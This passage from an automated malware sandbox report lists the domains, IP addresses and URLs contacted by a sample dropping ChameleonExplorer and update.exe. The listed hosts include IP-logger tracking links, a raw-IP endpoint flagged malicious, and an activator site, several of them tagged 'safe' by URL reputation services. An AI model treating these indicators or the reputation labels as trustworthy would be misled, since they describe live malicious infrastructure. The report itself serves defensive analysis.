                      http://www.chameleon-managers.com3t0%Avira URL Cloudsafe
                      http://www.chameleon-managers.com0%Avira URL Cloudsafe
                      http://www.chameleon-managers.com/contacts.php?program=0%Avira URL Cloudsafe
                      http://www.chameleon-managers.com3Y4=A4=AhXInno0%Avira URL Cloudsafe
                      http://crl.startssl.com/sca-code2.crl0#0%Avira URL Cloudsafe
                      http://51.15.219.86/1/index.php0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      2no.co
                      		148.251.234.93
                      		truefalseunknown
                      iplogger.org
                      		148.251.234.83
                      		truefalse
                        		high
                        ghs.googlehosted.com
                        		142.250.180.147
                        		truefalseunknown
                        neosoft-activator.appspot.com
                        		142.250.184.84
                        		truefalseunknown
                        www.chameleon-managers.com
                        		unknown
                        		unknowntrueunknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://iplogger.org/unknown/2no.co/1dHC37/unknownfalse
                          		high
                          https://2no.co/1dHC37false
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.chameleon-managers.com/info/versions/false
                          • Avira URL Cloud: safe
                          		unknown
                          http://51.15.219.86/1/index.phptrue
                          • Avira URL Cloud: safe
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://www.chameleon-managers.comQN(cexplorer.exe, 00000001.00000003.401105982.0000000002284000.00000004.00001000.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		low
                          https://wl.gl/tgB7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.335833286.0000000004926000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323870440.000000000491D000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://cdn.iplogger.org/logo/120.pngB7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.326690413.0000000004916000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            https://iplogger.org/_B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.336526085.00000000048BB000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.337052630.00000000048D3000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.342430878.00000000048D4000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000002.384294738.00000000048D4000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              http://aia.startssl.com/certs/sca.code2.crt06cexplorer.exe, 00000001.00000003.267125159.00000000025F6000.00000004.00001000.00020000.00000000.sdmp, cexplorer.exe, 00000001.00000003.267400805.000000007FE92000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000002.386513237.000000000018E000.00000004.00000010.00020000.00000000.sdmp, ChameleonExplorer.exe, 00000011.00000002.364176712.0000000001535000.00000004.00000020.00020000.00000000.sdmp, ExplorerHelper32.dll.16.drfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://dotbit.me/a/update.exe, 00000003.00000002.361422399.0000000003176000.00000040.00001000.00020000.00000000.sdmp, update.exe, 00000014.00000002.410625256.00000000029B6000.00000040.00001000.00020000.00000000.sdmp, update.exe, 00000014.00000002.410254006.0000000000401000.00000020.00001000.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              https://cdn.iplogger.org/js/functions.js?1.6.5B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.340289325.00000000048AB000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.335833286.0000000004926000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.336842417.00000000048AA000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323870440.000000000491D000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://help.iplogger.org/knowledgebase.php?category=2B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323870440.000000000491D000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://iplogger.org/unknown/2no.co/1dHC37/unknownkkB7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.340652993.0000000004860000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000002.382943701.0000000004860000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.chameleon-managers.com3&cexplorer.tmp, 00000002.00000003.380132224.00000000034BA000.00000004.00001000.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		low
                                    https://play.google.com/store/apps/details?id=com.iplogger.android.free&utm_source=site&utm_campaignB7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.335833286.0000000004926000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.336842417.00000000048AA000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323870440.000000000491D000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      http://crl.startssl.com/sfsca.crl0fcexplorer.exe, 00000001.00000003.267125159.00000000025F6000.00000004.00001000.00020000.00000000.sdmp, cexplorer.exe, 00000001.00000003.267400805.000000007FE92000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000002.386513237.000000000018E000.00000004.00000010.00020000.00000000.sdmp, ChameleonExplorer.exe, 00000011.00000002.364176712.0000000001535000.00000004.00000020.00020000.00000000.sdmp, ExplorerHelper32.dll.16.drfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://counter.yadro.ru/hit?B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.340289325.00000000048AB000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.335833286.0000000004926000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.336842417.00000000048AA000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323870440.000000000491D000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://iplogger.org/mac-checker/B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323870440.000000000491D000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://cdn.iplogger.org/icons/tools_7.svgB7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.335833286.0000000004926000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323870440.000000000491D000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.chameleon-managers.comsKcexplorer.exe, 00000001.00000003.401105982.00000000021B6000.00000004.00001000.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.chameleon-managers.com/subscription/?action=latest&key=ChameleonExplorer.exe, 00000006.00000000.285360037.0000000000429000.00000020.00000001.01000000.0000000B.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://iplogger.org/my-ip/B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323870440.000000000491D000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.palkornel.hu/innosetup%1cexplorer.exe, 00000001.00000003.266890052.00000000023A0000.00000004.00001000.00020000.00000000.sdmp, cexplorer.exe, 00000001.00000003.401105982.00000000021B6000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.268710353.0000000003250000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.382402098.0000000002184000.00000004.00001000.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://cdn.iplogger.org/css/libs.css?1.6.5B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.335833286.0000000004926000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323870440.000000000491D000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000002.382943701.0000000004860000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.340652993.00000000048A9000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://iplogger.org/location-tracker/B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323870440.000000000491D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.chameleon-managers.com3_lmPlmPcexplorer.tmp, 00000002.00000003.382402098.0000000002184000.00000004.00001000.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		low
                                                https://t.me/iplogger_teamB7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.335833286.0000000004926000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.336842417.00000000048AA000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323870440.000000000491D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://iplogger.org/privacy/B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323870440.000000000491D000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000002.382943701.0000000004860000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.340652993.00000000048A9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.innosetup.com/cexplorer.exe, 00000001.00000003.267125159.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, cexplorer.exe, 00000001.00000003.267400805.000000007FD80000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000000.268000022.0000000000401000.00000020.00000001.01000000.00000005.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://cdn.iplogger.org/icons/tools_12.svgB7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.335833286.0000000004926000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323870440.000000000491D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://twitter.com/iplogger_teamB7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.335833286.0000000004926000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.336842417.00000000048AA000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323870440.000000000491D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://www.chameleon-managers.com3jcexplorer.tmp, 00000002.00000003.382402098.0000000002184000.00000004.00001000.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://cdn.iplogger.org/favicon.icoB7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.335833286.0000000004926000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.341900719.0000000004919000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.336985372.0000000004918000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323870440.000000000491D000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.336463957.0000000004916000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.326690413.0000000004916000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://www.reddit.com/r/IPLogger_Team/B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.335833286.0000000004926000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.336842417.00000000048AA000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323870440.000000000491D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://www.chameleon-managers.com3hcexplorer.tmp, 00000002.00000003.382402098.0000000002184000.00000004.00001000.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://help.iplogger.org/?a=addB7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.335833286.0000000004926000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.336842417.00000000048AA000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323870440.000000000491D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://www.startssl.com/policy0cexplorer.exe, 00000001.00000003.267125159.00000000025F6000.00000004.00001000.00020000.00000000.sdmp, cexplorer.exe, 00000001.00000003.267400805.000000007FE92000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000002.386513237.000000000018E000.00000004.00000010.00020000.00000000.sdmp, ChameleonExplorer.exe, 00000011.00000002.364176712.0000000001535000.00000004.00000020.00020000.00000000.sdmp, ExplorerHelper32.dll.16.drfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://cdn.iplogger.org/js/selectize.min.jsB7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.340289325.00000000048AB000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.335833286.0000000004926000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.336842417.00000000048AA000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323870440.000000000491D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://www.chameleon-managers.com3lcexplorer.tmp, 00000002.00000003.382402098.0000000002184000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://schema.orgB7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.335833286.0000000004926000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323870440.000000000491D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://www.chameleon-managers.com/contacts.php?utm_source=program&utm_medium=question&utm_campaign=ChameleonExplorer.exe, 00000006.00000000.285360037.0000000000429000.00000020.00000001.01000000.0000000B.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://www.chameleon-managers.com3ccexplorer.tmp, 00000002.00000003.382402098.0000000002184000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://cdn.iplogger.org/icons/tools_2.svgB7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.335833286.0000000004926000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323870440.000000000491D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://cdn.iplogger.org/logo/76.pngB7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.326690413.0000000004916000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://cdn.iplogger.org/icons/tools_14.svgB7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.335833286.0000000004926000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323870440.000000000491D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://www.chameleon-managers.com3fcexplorer.tmp, 00000002.00000003.382402098.0000000002184000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        http://www.chameleon-managers.com3gcexplorer.tmp, 00000002.00000003.382402098.0000000002184000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://wl.gl/appB7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.335833286.0000000004926000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323870440.000000000491D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        http://www.chameleon-managers.com3cexplorer.tmp, 00000002.00000003.382402098.0000000002184000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        http://www.chameleon-managers.com3dcexplorer.tmp, 00000002.00000003.382402098.0000000002184000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://cdn.iplogger.org/icons/tools_6.svgB7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.335833286.0000000004926000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323870440.000000000491D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://www.chameleon-managers.com3ecexplorer.tmp, 00000002.00000003.382402098.0000000002184000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          http://www.chameleon-managers.comSQcexplorer.exe, 00000001.00000003.401105982.00000000021B6000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://help.iplogger.org/?a=add&amp;category=2B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.335833286.0000000004926000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.336842417.00000000048AA000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323870440.000000000491D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://iplogger.org/AB7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.336526085.00000000048BB000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.337052630.00000000048D3000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.342430878.00000000048D4000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000002.384294738.00000000048D4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://www.startssl.com/0Qcexplorer.exe, 00000001.00000003.267125159.00000000025F6000.00000004.00001000.00020000.00000000.sdmp, cexplorer.exe, 00000001.00000003.267400805.000000007FE92000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000002.386513237.000000000018E000.00000004.00000010.00020000.00000000.sdmp, ChameleonExplorer.exe, 00000011.00000002.364176712.0000000001535000.00000004.00000020.00020000.00000000.sdmp, ExplorerHelper32.dll.16.drfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://help.iplogger.org/knowledgebase.php?categorB7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323870440.000000000491D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://www.chameleon-managers.com3V$mP$mPcexplorer.tmp, 00000002.00000003.382402098.0000000002184000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		low
                                                                                https://2no.co/B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.340652993.0000000004860000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000002.382943701.0000000004860000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://cdn.iplogger.org/icons/tools_4.svgB7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.335833286.0000000004926000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323870440.000000000491D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://cdn.iplogger.orgB7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.335833286.0000000004926000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.336985372.0000000004918000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323870440.000000000491D000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.336463957.0000000004916000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.326690413.0000000004916000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://cdn.iplogger.org/css/ui.css?1.6.5B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.335833286.0000000004926000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.341900719.0000000004919000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.336985372.0000000004918000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323870440.000000000491D000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.336463957.0000000004916000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.326690413.0000000004916000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://neosoft-activator.appspot.com/ChameleonExplorer.exe, 00000006.00000002.326211855.000000000152C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      https://iplogger.org/shortener/B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323870440.000000000491D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupUcexplorer.exe, 00000001.00000000.266649495.0000000000401000.00000020.00000001.01000000.00000004.sdmpfalse
                                                                                          		high
                                                                                          https://iplogger.org/ip-services/B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323870440.000000000491D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://ip-api.com/jsonupdate.exe, 00000003.00000002.361422399.0000000003176000.00000040.00001000.00020000.00000000.sdmp, update.exe, 00000014.00000002.410625256.00000000029B6000.00000040.00001000.00020000.00000000.sdmp, update.exe, 00000014.00000002.410254006.0000000000401000.00000020.00001000.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://www.chameleon-managers.comccexplorer.tmp, 00000002.00000003.382402098.0000000002184000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              https://iplogger.org/unknown/2no.co/1dHC37/unknownLocationETagAuthentication-InfoAgeAccept-RangesLasB7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.337029009.0000000004913000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.326690413.0000000004909000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.336463957.000000000490C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://iplogger.org/1nFPF4.pngB7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.340289325.00000000048AB000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.335833286.0000000004926000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.336842417.00000000048AA000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323870440.000000000491D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://iplogger.org/B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000002.384294738.00000000048D9000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.335833286.0000000004926000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.336526085.00000000048BB000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323870440.000000000491D000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.337052630.00000000048D3000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.342430878.00000000048D4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://iplogger.org/url-checker/B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323870440.000000000491D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://www.chameleon-managers.com/subscription/?action=extend&key=ChameleonExplorer.exe, 00000006.00000000.285360037.0000000000429000.00000020.00000001.01000000.0000000B.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
